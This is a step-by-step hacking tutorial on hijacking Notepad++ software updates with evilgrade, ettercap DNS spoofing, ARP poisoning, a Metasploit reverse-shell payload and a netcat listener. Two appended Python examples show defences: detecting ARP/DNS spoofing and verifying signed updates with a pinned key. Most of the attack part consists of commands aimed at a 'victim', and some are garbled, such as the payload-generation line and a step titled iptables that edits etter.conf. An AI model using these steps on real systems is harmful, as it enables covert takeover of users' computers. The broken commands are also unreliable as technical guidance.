Exploiting "Trustworthy" Software Updates
All of us have seen that message: software updates are available now! Invariably, we trust this message and download the update to presumably make our system work better, add a new feature, or make our system safer. What if, instead, when we're prompted to download that update, we were installing malicious software that would give a malicious hacker control of our system? That's what we are going to do to our victim here!
Unlike many of our hacks, this one is largely independent of other factors such as operating system, open ports, etc. Here we will be abusing trust, not a flaw in an operating system or application.
This will be one of the most complex hacks we've ever done on Null Byte, so if you're new to hacking, you may want to come back after doing a bit of background work. This hack also builds on what we did in an earlier tutorial using a MitM attack, so you may want to read that one first.
Step 1: Install NotePad++
In this hack, we will be using Notepad++ as the example software whose update we will hijack, so you will need to install it on one system. In my example, I have installed it on a Windows 7 system. You can download the newest version of Notepad++ from its website.
Step 2: Download & Install EvilGrade
Next, we will install Infobytesec's evilgrade, which is designed as a modular framework that lets an attacker take advantage of poor upgrade implementations by injecting "evil" updates into the update process of an unaware user. We can download evilgrade from GitHub. Now make a directory called evilgrade, change into it, and unpack the archive there.
- mkdir -p /root/evilgrade
- cd /root/evilgrade
- tar -xvf isr-evilgrade-2.0.0.tar.gz
Step 3: Run Evilgrade
Next we need to run evilgrade. We type:
- ./evilgrade
Once it loads, we are dropped at the evilgrade prompt:
- evilgrade>
Step 4: List Modules
Now that evilgrade is running, let's take a look at the modules that evilgrade has built in. Here, each module represents a piece of software whose update/upgrade process evilgrade is designed to hijack. In this hack, of course, we will be hijacking the upgrade of Notepad++. As you can see below, evilgrade has modules for many other pieces of software, but it is far from covering all software updates/upgrades.
- show modules
Step 5: Configure Notepad
Next, we need to tell evilgrade which software's upgrade process we want to hijack. Let's tell evilgrade we want to hijack notepadplus.
- evilgrade>configure notepadplus
Step 6: See What Parameters the Notepad++ Module Requires
Our next step is to see what parameters the evilgrade notepadplus module requires to function. We check this with a command similar to Metasploit's, by typing:
- show options
Step 7: Generate a Payload with Metasploit
Now that we have evilgrade set up and configured, we need to develop a malicious payload to deliver to the upgrading software instead of the actual upgrade. We can do this with Metasploit. If you have followed my other tutorials on Metasploit, you know that we can choose from a number of different payloads (a payload is what we load onto the victim system to give us control). In this case, we will be using one of the most basic payloads, the reverse TCP shell.
We can generate a payload without opening the Metasploit console with the following command. This command takes a payload from the Metasploit framework and writes it to a file called notepadplus_update.exe, which evilgrade will serve in place of the real update.
- /pentest/exploits/framework/modules/payloads/windows shell_reverse_tcp LHOST 192.168.1.104 > /root/evilgrade/notepadplus_update.exe
Step 8: Start Evilgrade
Next, we have to start the evilgrade server. This is done with a simple start command.
- evilgrade>start
Step 9: Add Notepad++ Update Server as the Domain to Steal
Our next step is to add the Notepad++ update server as the domain we want to hijack. We can do this by adding an entry to ettercap's etter.dns file, which the dns_spoof plugin uses. This lets us spoof the domain name of the update source for the victim software: the victim asks for the real update host and is answered with our address instead. Since Notepad++ is hosted on SourceForge, we add the following line to the end of the etter.dns file.
- notepad-plus.sourceforge.net A 192.168.1.104
Step 10: Configure Iptables
iptables is the built-in Linux firewall/router. We can use it to route the victim's traffic through our system in a MitM attack. Let's open the etter.conf file in your favorite text editor.
- kwrite /etc/etter.conf
Step 11: Start Ettercap
We can now start ettercap with the following command.
- ettercap -Tqi eth0 -P dns_spoof -M arp 192.168.1.114 192.168.1.104
- -T designates the text (terminal) interface
- -q says use quiet mode
- -i eth0 says we want to use eth0 as our interface
- -P dns_spoof designates that we want to load the dns_spoof plugin
- -M arp says we want to use a MitM attack with ARP poisoning between the two IP addresses
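Both of the preceding steps leave traces on the victim's side: the ARP poisoning changes what the victim's neighbour table says about its gateway, and the etter.dns entry makes an Internet-hosted download server resolve to a LAN address. The script below is an added example for checking for those two indicators on a host; it is not code from the original post, from ettercap or from evilgrade. The neighbour-table snapshots and DNS answers it works on are constructed: 192.168.1.104 (attacker) and 192.168.1.114 (victim) reuse the lab addresses from this post, while the gateway 192.168.1.1, the MAC addresses and the public placeholder 1.2.3.4 are assumptions.

```python
"""Host-side indicators for ARP poisoning and DNS spoofing of an update host.

Added example: not code from the original post, from ettercap or from
evilgrade. Snapshot lines and DNS answers below are constructed; the
gateway 192.168.1.1 and every MAC address are assumptions.
"""
import ipaddress
import re
from typing import Dict, List

# One line of `ip neigh show`, e.g.
# "192.168.1.1 dev eth0 lladdr aa:bb:cc:00:00:01 REACHABLE"
# Entries without lladdr (FAILED / INCOMPLETE) carry no MAC and are skipped.
_NEIGH_RE = re.compile(
    r"^(?P<ip>\S+)\s+dev\s+\S+\s+lladdr\s+(?P<mac>(?:[0-9a-f]{2}:){5}[0-9a-f]{2})\b",
    re.IGNORECASE,
)


def parse_neigh(lines: List[str]) -> Dict[str, str]:
    """Map IP -> MAC (lower-cased) from `ip neigh show` output."""
    table: Dict[str, str] = {}
    for line in lines:
        m = _NEIGH_RE.match(line.strip())
        if m:
            table[m.group("ip")] = m.group("mac").lower()
    return table


def arp_spoof_indicators(before: Dict[str, str], after: Dict[str, str],
                         gateway_ip: str) -> List[str]:
    """Compare two neighbour-table snapshots taken on a potential victim.

    Two signs of an `ettercap -M arp` style poisoning show up here: the
    gateway's MAC changes between snapshots, and one MAC starts answering
    for more than one IP (the attacker's NIC claiming the gateway address
    as well as its own).
    """
    findings: List[str] = []
    old, new = before.get(gateway_ip), after.get(gateway_ip)
    if old and new and old != new:
        findings.append(f"gateway {gateway_ip} MAC changed {old} -> {new}")
    by_mac: Dict[str, List[str]] = {}
    for ip, mac in after.items():
        by_mac.setdefault(mac, []).append(ip)
    for mac, ips in sorted(by_mac.items()):
        if len(ips) > 1:
            # A router holding several addresses can look like this too, so
            # treat it as a lead to confirm rather than a verdict on its own.
            findings.append(f"MAC {mac} answers for {', '.join(sorted(ips))}")
    return findings


def dns_answer_suspicious(answer_ip: str) -> bool:
    """True when a public update host resolves to a private, loopback or
    link-local address: exactly what the etter.dns entry above produces,
    and something an Internet-hosted download server never should do."""
    addr = ipaddress.ip_address(answer_ip)
    return addr.is_private or addr.is_loopback or addr.is_link_local


# Constructed snapshots as seen from the victim 192.168.1.114.
NEIGH_BEFORE = [
    "192.168.1.1 dev eth0 lladdr aa:bb:cc:00:00:01 REACHABLE",
    "192.168.1.104 dev eth0 lladdr aa:bb:cc:00:01:04 STALE",
    "192.168.1.20 dev eth0  FAILED",
]
# After poisoning, the gateway entry carries the attacker's MAC.
NEIGH_AFTER = [
    "192.168.1.1 dev eth0 lladdr aa:bb:cc:00:01:04 REACHABLE",
    "192.168.1.104 dev eth0 lladdr aa:bb:cc:00:01:04 REACHABLE",
]

if __name__ == "__main__":
    before, after = parse_neigh(NEIGH_BEFORE), parse_neigh(NEIGH_AFTER)
    for finding in arp_spoof_indicators(before, after, "192.168.1.1"):
        print("ARP:", finding)
    print("update host -> 192.168.1.104 suspicious:", dns_answer_suspicious("192.168.1.104"))
```

On a real host you would feed `parse_neigh` the output of `ip neigh show` taken periodically, and `dns_answer_suspicious` the A record returned for the update hostname; neither check needs packet capture, which is why both survive on an ordinary workstation.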
Step 12: Start Netcat Listener
Now we need to start the netcat listener on our attack machine. We need to listen on the port defined by the evilgrade module, in this case 1234 for Notepad++.
- nc -l -p 1234
Step 13: Open Notepad++
Now, let's open Notepad++ on our Windows victim machine.
Step 14: Verify the DNS Spoof
If the update doesn't fire as soon as you open Notepad++, we need to check that the DNS spoof is working. Evilgrade is a powerful tool for hijacking software updates. By mounting a Man-in-the-Middle attack, we can attack just about any operating system through the software doing the updating. The only limitation we have here is the set of modules that evilgrade ships for the software whose updates it can hijack.
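The whole attack works because the updater trusts whatever the update hostname resolves to and runs whatever it downloads. An updater that pins its publisher's public key and verifies a signature over the update bytes before running them is not helped by the DNS spoof at all: a tampered file fails verification, and so does a file the attacker signs with a key of their own. The following is an added example of that client-side gate; it is not code from the original post, from Notepad++ or from evilgrade. The update bytes, both key pairs and the tampered payload are constructed, and the scheme is textbook (unpadded) RSA over a SHA-256 digest, chosen only so that the demonstration needs nothing beyond the Python standard library; a real updater should use a vetted library signature such as Ed25519 rather than this construction.

```python
"""Client-side update gate with a pinned publisher key.

Added example: not code from the original post, from Notepad++ or from
evilgrade. Keys, update bytes and the tampered payload are constructed.
Textbook RSA over SHA-256 is used only to stay standard-library only;
production code should use a vetted signature scheme (e.g. Ed25519).
"""
import hashlib
import secrets
from typing import Dict, Tuple

Key = Tuple[int, int]  # (modulus n, exponent)


def _is_probable_prime(n: int, rounds: int = 32) -> bool:
    """Miller-Rabin probable-prime test; sufficient for a demonstration key."""
    if n < 2:
        return False
    for p in (2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37):
        if n % p == 0:
            return n == p
    d, r = n - 1, 0
    while d % 2 == 0:
        d //= 2
        r += 1
    for _ in range(rounds):
        a = secrets.randbelow(n - 3) + 2
        x = pow(a, d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True


def _random_prime(bits: int) -> int:
    while True:
        cand = secrets.randbits(bits) | (1 << (bits - 1)) | 1  # exact width, odd
        if _is_probable_prime(cand):
            return cand


def generate_publisher_key(bits: int = 1024) -> Tuple[Key, Key]:
    """Return ((n, e), (n, d)). The private half stays on the publisher's
    signing host; the public half is compiled into the client."""
    e = 65537
    while True:
        p, q = _random_prime(bits // 2), _random_prime(bits // 2)
        phi = (p - 1) * (q - 1)
        if p != q and phi % e:
            return (p * q, e), (p * q, pow(e, -1, phi))


def _digest_int(data: bytes) -> int:
    return int.from_bytes(hashlib.sha256(data).digest(), "big")


def sign(private: Key, data: bytes) -> int:
    n, d = private
    return pow(_digest_int(data), d, n)


def verify(public: Key, data: bytes, signature: int) -> bool:
    n, e = public
    if not 0 < signature < n:
        return False
    return pow(signature, e, n) == _digest_int(data)


class UpdateRejected(Exception):
    pass


def install_update(update: bytes, signature: int, pinned_public: Key) -> str:
    """The check a hardened updater runs before executing anything it
    downloaded. Because the key is pinned in the client, which server (or
    which DNS answer) the bytes came from makes no difference."""
    if not verify(pinned_public, update, signature):
        raise UpdateRejected("signature does not verify under the pinned publisher key")
    return hashlib.sha256(update).hexdigest()  # stand-in for "run the installer"


def run_demo() -> Dict[str, str]:
    """Three downloads against one pinned key: genuine, tampered in transit,
    and re-signed by an attacker who controls the spoofed update server."""
    pub, priv = generate_publisher_key()
    genuine = b"notepadplus_update.exe (constructed stand-in for a real installer)"
    tampered = genuine + b"\x00<constructed malicious payload>"
    _attacker_pub, attacker_priv = generate_publisher_key()  # never pinned by the client
    outcomes: Dict[str, str] = {}
    for label, data, sig in (
        ("genuine", genuine, sign(priv, genuine)),
        ("tampered", tampered, sign(priv, genuine)),
        ("attacker_signed", tampered, sign(attacker_priv, tampered)),
    ):
        try:
            install_update(data, sig, pub)
            outcomes[label] = "installed"
        except UpdateRejected:
            outcomes[label] = "rejected"
    return outcomes


if __name__ == "__main__":
    print(run_demo())
```

The point of `run_demo` is the third case: an attacker who owns the DNS answer and the web server can sign anything they like, but only with a key the client was never built to trust. Pinning the publisher key, rather than trusting the hostname or the TLS connection alone, is what closes the gap evilgrade's modules exploit.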